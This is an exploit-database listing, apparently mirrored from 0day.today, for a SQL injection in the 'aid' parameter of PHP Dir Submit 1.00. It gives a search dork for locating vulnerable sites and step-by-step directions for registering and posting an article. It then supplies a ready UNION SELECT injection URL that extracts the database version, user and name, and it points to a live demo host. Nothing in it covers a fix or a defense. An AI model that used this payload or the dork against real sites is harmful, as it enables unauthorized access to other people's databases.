Lucene search

K

PHP Dir Submit (aid) Remote SQL Injection Vulnerability

๐Ÿ—“๏ธย 24 Aug 2009ย 00:00:00Reported byย Mr.tro0oqyTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 20ย Views

PHP Dir Submit Version 1.00 (aid) Remote SQL Injection Vuln. Vulnerability in PHP Dir Submit script allows remote SQL injection

Show more
Code
=======================================================
PHP Dir Submit (aid) Remote SQL Injection Vulnerability
=======================================================


======================================================================
[ร‚ยป] Script : PHP Dir Submit Version 1.00 (aid) Remote SQL Injection Vuln

[ร‚ยป] Language : php

[ร‚ยป] Dork : Powered by PHP Dir Submit - Directory Submission Script  

[ร‚ยป] Script site : http://www.phpdirsubmit.com

[ร‚ยป] Founder: Mr.tro0oqy <- from Yemen
======================================================================
exploit:
--------
u must be registered in site

step1:
go to : 
-------
www.xxx.com/path/index.php?menu=signup
-------
step2:
after that : 
-------
add post from here

www.xxx.com/index.php?menu=articles
-------
step3:
press on "View Article" 
and start to inject


http://www.xxx.com/path/index.php?menu=showarticle&aid=3+and+1=0/**/union/**/select/**/1,version(),3,4,user(),database(),7,8,9,10,11--

--------
demo:
--------
http://demo.phpdirsubmit.com
--------



#  0day.today [2018-04-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Aug 2009 00:00Current
7.1High risk
Vulners AI Score7.1
20
.json
Report